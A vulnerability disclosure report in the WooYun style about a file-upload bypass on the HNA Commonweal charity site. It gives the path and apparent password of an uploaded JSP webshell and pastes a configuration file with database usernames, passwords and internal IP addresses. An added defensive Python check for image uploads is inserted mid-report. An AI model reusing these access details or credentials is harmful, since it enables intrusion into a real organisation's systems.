WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2015-03-20: Details sent to the vendor, awaiting the vendor's handling
2015-03-23: Vendor has confirmed; details disclosed to the vendor only
2015-04-02: Details disclosed to core white hats and domain experts
2015-04-12: Details disclosed to regular white hats
2015-04-22: Details disclosed to intern white hats
2015-05-07: Details disclosed to the public
As the title says..
Site: HNA Commonweal http://csr.hnagroup.com/
It is a charity site. Sites like this are good, they help people, so everyone should protect it.
Here we registered an account; the image (avatar) feature has an upload that can be bypassed.
Although the page reports the upload as failed, the file has in fact been uploaded successfully, and we obtained a shell.
webshell: http://csr.hnagroup.com/hna-commonweal/images/pic/commonwealuser/jspcmd1.jsp cmd!@#
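The root cause above is an image upload that stores whatever it receives, including a .jsp, under a web-served directory. As an added example (not code from the original report or from the site's application), the following Python check, written from the defender's side, validates an upload by allowlisted extension plus magic bytes and then walks an upload directory such as images/pic/commonwealuser/ to flag any stored file that is not a genuine image; the directory layout and sample files are constructed.

```python
"""Added example: validate image uploads and audit an upload directory for
server-side script files. Directory names and sample files are constructed."""
import os
import tempfile

# Allowlisted image extensions and the magic bytes each must start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Markers showing a file in an image directory is a JSP/script, not an image.
SCRIPT_MARKERS = (b"<%", b"<jsp:", b"<?php")


def validate_image_upload(filename, data):
    """Return (ok, reason). Rejects double/missing extensions, non-image
    extensions, and content whose magic bytes do not match the extension."""
    name = os.path.basename(filename).lower()
    if name.count(".") != 1:                 # e.g. shell.jsp.jpg or no extension
        return False, "unexpected extension structure"
    ext = os.path.splitext(name)[1]
    if ext not in IMAGE_MAGIC:
        return False, "extension not allowlisted: %s" % ext
    if not any(data.startswith(m) for m in IMAGE_MAGIC[ext]):
        return False, "content does not match %s magic bytes" % ext
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in image data"
    return True, "ok"


def find_suspicious_uploads(root):
    """Walk an upload directory and report files that fail validation.
    Only the first 4 KiB of each file is inspected (magic bytes + markers)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                head = fh.read(4096)
            ok, reason = validate_image_upload(fname, head)
            if not ok:
                findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)


def demo():
    """Constructed upload directory: one valid PNG and one stray JSP file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "commonwealuser"))
    with open(os.path.join(root, "commonwealuser", "avatar.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(root, "commonwealuser", "jspcmd1.jsp"), "wb") as fh:
        fh.write(b'<% out.println("placeholder"); %>')   # harmless marker only
    return find_suspicious_uploads(root)
```

Run demo() to see the JSP flagged while the PNG passes; in production the same validation belongs in the upload handler before the file is written, and the directory walk can run as a periodic audit.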
Root privileges. The impact is self-evident. Configuration file:
# JDBC configuration
spring.jdbc.driver=com.mysql.jdbc.Driver
# local server
# 98 database account:mixiaofei password:mixiaofei
# 95 database account:hnauser password:123456
#localhost root 123456
#spring.jdbc.username=mixiaofei
#spring.jdbc.password=mixiaofei
#95database 10.72.63.95
#spring.jdbc.url=jdbc\:mysql\://10.72.63.95\:3306/hnaservice?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true
#spring.jdbc.url=jdbc\:mysql\://10.72.63.98\:3306/hnaservice?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true
#spring.jdbc.username=menggl
#spring.jdbc.password=mglin820987
#spring.jdbc.username=mixiaofei
#spring.jdbc.password=mixiaofei
#spring.jdbc.url=jdbc\:mysql\://10.72.63.98\:3306/hnaservice?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true
#spring.jdbc.username=hnauser
spring.jdbc.username=root
spring.jdbc.password=123456
spring.jdbc.url=jdbc\:mysql\://localhost\:3306/hnacommonweal?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true
# test
#spring.jdbc.url=jdbc\:mysql\://localhost\:3306/hna-commonweal-test?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true
# production
#spring.jdbc.url=jdbc\:mysql\://localhost\:3306/hnacommonweal?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true
#spring.jdbc.username=hnauser
Please fix this as soon as possible; a charity site deserves our support, it helps people in need.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-03-23 17:25
Thank you, we will immediately organize staff to fix it.
None yet